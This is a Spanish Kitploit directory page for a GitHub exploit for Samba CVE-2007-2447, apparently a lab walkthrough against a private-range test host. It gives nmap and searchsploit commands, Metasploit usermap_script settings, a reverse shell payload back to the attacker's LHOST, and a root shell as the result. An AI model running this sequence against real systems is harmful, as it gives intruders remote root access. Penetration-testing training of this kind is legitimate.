Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Samba-Exploit-CVE-2007-2447 | Kitploit
Herramientas/GitHubGitHub/nulltrace1336/samba-exploit-cve-2007-2447
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubnulltrace1336/samba-exploit-cve-2007-2447

Samba-Exploit-CVE-2007-2447

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

🎬 Este vídeo de YouTube

Vídeo de YouTube

1️⃣ Escaneo del objetivo (Nmap)

root@kitploit:~
nmap -sS -sV -p 139,445 192.168.56.102

Resultado esperado: 139/tcp open netbios-ssn Samba smbd 3.X 445/tcp open microsoft-ds Samba smbd 3.0.20-Debian

👉 Versión de Samba: 3.0.20 Es vulnerable a CVE-2007-2447.

2️⃣ Detección del exploit de Samba

root@kitploit:~
searchsploit samba 3.0.20

Resultado:

Samba 3.0.20 - 'Username' map script Command Execution

3️⃣ Iniciar Metasploit

root@kitploit:~
msfconsole

4️⃣ Seleccionar el exploit de Samba

root@kitploit:~
use exploit/multi/samba/usermap_script

5️⃣ Configuración del exploit

root@kitploit:~
set RHOSTS 192.168.56.102
set RPORT 139
set LHOST 192.168.56.101

El payload será automático:

cmd/unix/reverse

Comprobación:

root@kitploit:~
show options

6️⃣ Ejecutar el exploit

root@kitploit:~
run

o

root@kitploit:~
exploit

7️⃣ Resultado 🎉

Si tiene éxito:

Command shell session opened

Comprobamos:

root@kitploit:~
whoami

👉 Resultado:

root@kitploit:~
root
Descargar herramienta